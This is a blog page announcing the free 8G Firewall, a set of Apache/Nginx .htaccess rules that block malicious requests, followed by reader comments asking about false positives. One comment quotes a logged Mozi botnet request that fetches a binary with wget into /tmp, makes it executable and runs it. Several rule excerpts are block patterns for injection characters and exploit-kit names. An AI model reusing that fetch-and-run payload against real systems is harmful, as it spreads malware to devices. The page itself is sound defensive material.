🍁 Fall Sale: Save 25% on Pro Plugins & Books w/ code FALL2026
Web Dev + WordPress + Security

8G Firewall

After more than a year of beta testing, 8G Firewall is ready for use on production sites. So you can benefit from the powerful protection provided by the latest evolution of the nG Firewall (aka nG Blacklist). The 8G Firewall offers lightweight, server-level protection against a wide range of malicious requests, bad bots, automated attacks, spam, and many other types of threats and nonsense. 8G is a lightweight (only 17KB) strong firewall that provides site security and peace of mind. Plus, 8G is open source and 100% free for everyone :)

Want to block AI bots? Check out my Ultimate Block List to Stop AI Bots »
Update: 8G has been forked for both Nginx and Apache by Tonkünstler-on-the-Bund. The Apache fork uses SetEnvIf instead of mod_rewrite. Learn more and download at GitHub.

Contents

About 8G Firewall

The 8G Firewall is a carefully crafted set of security rules for Apache and Nginx servers. It can be applied via your site’s public root .htaccess file, or added via server configuration. Once added, 8G provides powerful server-level protection against a wide range of malicious requests, bad bots, automated attacks, spam, and many other types of threats and nonsense. It’s a lightweight (only 17KB) strong firewall that improves site security and peace of mind.

8G Firewall builds on 7G, optimizing scope with performance while minimizing false positives. Learn more about nG-series firewall, including 8G and all the details:

Support 8G Firewall: Donate via PayPal or your favorite digital coin »

Reporting Bugs

As of version 1.3, 8G is out of beta and ready for production sites. Any bugs (false positives) may be reported via my contact form. Or if you have any questions or non-bug-related feedback, you are welcome to leave a comment on this post. Thank you :)

nG Logging: Just FYI, 7G and 8G Firewall support logging of each request, matching patterns, and more. Learn how to enable logging with nG Firewall.

Download 8G Firewall

By downloading 8G, you agree to the terms set forth in the License and Disclaimer. You will find copy of the 8G changelog included in the zip download file. Check out the nG homepage for install steps and complete information.

Download 8G FirewallVersion 1.5 ( 7.74 KB ZIP )
Note: To retain the Unix LF EOL characters (line breaks) in the 8G text file, it is recommended to use a program that supports them, such as Notepad++ (free for Windows) or TextEdit or BBEdit (free for Mac). The line breaks keep the code structured and readable, instead of a big jumbled mess.

License & Disclaimer

8G Firewall is open source and 100% free for all. The only requirement is that the following credit lines are included when using 8G (or any of its parts).

# 8G FIREWALL
# https://perishablepress.com/8g-firewall/

Other than that, it’s all yours!

Disclaimer

The 8G Firewall is provided “as-is”, with the intention of helping people protect their sites against bad requests and other malicious activity. The code is open and free to use and modify as long as the first two credit lines remain intact. By using this code you assume all risk and responsibility for anything that happens. So use wisely, test thoroughly, and enjoy the benefits of my work :)

Show support

I spend countless hours developing the nG Firewall. I share it freely and openly with the hope that it will help make the Web a more secure place for everyone.

If you benefit from my work with nG Firewall and would like to show support, consider buying one of my books, such as .htaccess made easy. You’ll get a complete guide to .htaccess, exclusive forum access, and a ton of awesome techniques for configuring, optimizing, and securing your site.

Of course, tweets, likes, links, and shares are super helpful and very much appreciated. Your generous support allows me to continue developing the nG Firewall and other awesome resources for the community. Thank you kindly :)

Support 8G Firewall: Donate via PayPal, Stripe, or your favorite digital coin »

8G Notes

Any 8G-related notes will be added/updated below..

  • Only use 7G or 8G, not both
  • 8G is modular: each section can be removed/added as desired
  • There is an addon to block AI bots: Ultimate Block List to Stop AI Bots »
  • 8G is designed to work flawlessly on any website, not just WordPress
  • 8G adds new “HTTP COOKIE” rules
  • Please report any strings or user agents that should not be blocked
  • Always test well before going live and report any bugs or issues
  • If using the “WebP Express” plugin, remove env from Request URI rules
  • To enable “phpinfo() WP” plugin, remove phpinfo from Query String rules
  • To enable the “Ahrefs” bot, remove ahrefs from User Agent rules
  • Also note that 8G blocks the W3 Validator (I am unable to figure out why)

WordPress

If you need exact-match search results (i.e., surrounding search terms with quotation marks) when attaching items from the Media Library to a post, make the following edit. Locate this line:

RewriteCond %{QUERY_STRING} (;|<|>|\'|\"|\)|%0a|%0d|%22|%27|%3c|%3e|%00)(.*)...

And remove %22|, so the line becomes:

RewriteCond %{QUERY_STRING} (;|<|>|\'|\"|\)|%0a|%0d|%27|%3c|%3e|%00)(.*)...

Joomla

If you use Joomla plugin JCE Pro, make the following edit. Locate this line:

RewriteCond %{REQUEST_URI} (/)(filemanager|htdocs|httpdocs...

And remove filemanager|, so the line becomes:

RewriteCond %{REQUEST_URI} (/)(htdocs|httpdocs...

Other 8G-related notes will be added here..

About the Author
Jeff Starr = Fullstack Developer. Book Author. Teacher. Human Being.
Banhammer: Protect your WordPress site against threats.

204 responses to “8G Firewall”

  1. In the log I see some connection attempts with a strange request_method:

    27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$

    In my case, it doesn’t pass, because I have my own rule that blocks the HTTP/1.0 protocol.

  2. This part of the 8G firewall is blocking DuckDuckGo:

    amazonaws

    Correct?

    • Jeff Starr 2025/05/13 10:32 am • Reply

      No it doesn’t block DuckDuckGo or any search engine. “amazonaws” is the hostname for “Amazon Web Services”, which is web hosting plus other cloud services, etc. In 8G it is blocked when included in the hostname, because a lot of spammers and other bad actors use amazon hosting to run their exploits.

  3. On 23/5/8, Alex reported a problem with this line, which you suggested should be commented out until you fix it:

    RewriteCond %{REQUEST_URI} (/)((boot)?_?admin(er|istrator|s)?(_events)?)(\.php) [NC,OR]

    It appears to be the same in 8G. Has the issue been addressed?

  4. Also, can you confirm that the firewall is case-insensitive? e.g., I see you have ahrefs defined as a User-Agent to be blocked, but my phpBB board shows Ahrefs active as a registered user.

    • Jeff Starr 2025/05/16 7:16 am • Reply

      Yes each line/rule in the firewall is flagged with [NC], which means “no case”. Is the registered user named “Ahref”..? Because that would be different than the user agent. Ahref is an SEO/marketing tool and doesn’t really spam with user accounts.

  5. my wordpress website has an astra theme infinite scroll page with thumbs. when I use the 8G firewall, it disables that infinite scroll function. where in the .htaccess do I enable the infinite scroll function?

    • Jeff Starr 2025/05/27 12:06 pm • Reply

      Most likely the URLs that are required for infinite scroll are getting blocked by one of the firewall rules. If you provide some examples of the actual URLs that are getting blocked, I can let you know which rules are responsible, and thus resolve the issue.

  6. How can I prevent 8G Firewall from blocking SEMRush bot?

  7. User-agent: SemrushBot

    As this support page says:
    https://www.semrush.com/bot/

    • Jeff Starr 2025/06/07 12:12 pm • Reply

      Are you sure it is the user agent that is getting blocked? There is nothing in 8G that would match “SemrushBot” or any variation or partial match. So maybe the requests are blocked via URL or Query String rules..?

  8. I get some 100+ requests/10 mins for non-existent urls on my site creating huge number of 404s & I discovered it via rankmaths 404 section. They have a wide & unrelated IP ranges so I can’t ban them. No user agent too.

    This is the only thing I have from hosting’s access log – Please tell me how to ban it

    216.250.97.77 14.164.181.246 - [27/Jun/2025:13:02:44 +0100] "GET /pages/brillare-rewards HTTP/1.1" 404 22036 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36" "PHP/8.3.22" 0

    I could find the host – static.vnpt.vn and tried to ban it via htaccess but it does not work – I did some search and found out this is some sort of masking.

  9. In htaccess is it possible to answer AI bots with http code 402 instead of 403?
    Thanks.

    • Jeff Starr 2025/07/11 6:29 am • Reply

      Yes when using mod_rewrite, you can specify the response code in the RewriteRule. For example:

      <IfModule mod_rewrite.c>
      	RewriteCond %{REQUEST_URI} (bananas) [NC]
      	RewriteRule (.*) - [R=410,L]
      </IfModule>

      ..replace 410 with any HTTP status code.

  10. Lee McLean 2025/07/23 9:56 pm • Reply

    Hi. I had to revert to the 7g firewall as I found 8g was blocking some image file names e.g. img333xp.jpg. Can this be fixed?

    • Jeff Starr 2025/07/24 9:04 am • Reply

      Find the line that begins with this:

      RewriteCond %{REQUEST_URI} (@md5|00.temp00|0byte|0d4y|0day|0xor|wso1337|1h6j5|3xp|40dd1d|4price...

      Then remove exactly this: |3xp.

      Save changes and test well before going live.

  11. hi jeff!
    thx for your work, i use it a couple of years it helps me very much! but at the moment i can’t update to the actual version, because for every site, exept the home is a 404
    what do i wrong? thx in advance, roman

    • Jeff Starr 2025/08/25 6:15 am • Reply

      I don’t know it depends on many factors. Best advice would be to ask your web developer or web host, they should be able to help you get it sorted out.

  12. I will happily support with a donation if this works with my site. It’s phpbb and we get 100s of 1000s of “guest” visitors, and it often exceeds the hosting resources. Do you have any documentation for the firewall? It would be good to know how it works.

    • Jeff Starr 2025/08/27 11:21 am • Reply

      It depends on myriad factors, but in general 8G should stop a lot of the nonsense and help to conserve precious resources.

Leave a reply

Name and email required. Email kept private. Basic markup allowed. Please wrap any small/single-line code snippets with <code> tags. Wrap any long/multi-line snippets with <pre><code> tags. For more info, check out the Comment Policy and Privacy Policy.

Subscribe to comments on this post

Welcome
Perishable Press is operated by Jeff Starr, a professional web developer and book author with two decades of experience. Here you will find posts about web development, WordPress, security, and more »
Banhammer: Protect your WordPress site against threats.
Thoughts
Working on a complete redesign of Perishable Press :)
The Office is Cheers with more irony.
More fine-grained control of macOS screen brightness: hold down Option + Shift before pressing either of the brightness keys. You get 64 increments instead of the usual 16.
REST Pro Tools featured in David McCan’s new video on locking down WordPress.
Gonna try exercise.
Launching my new plugin, REST Pro Tools 🛠️ Granular control of the WP REST API.
The algorithm is way too hypersensitive.
Newsletter
Get news, updates, deals & tips via email.
Email kept private. Easy unsubscribe anytime.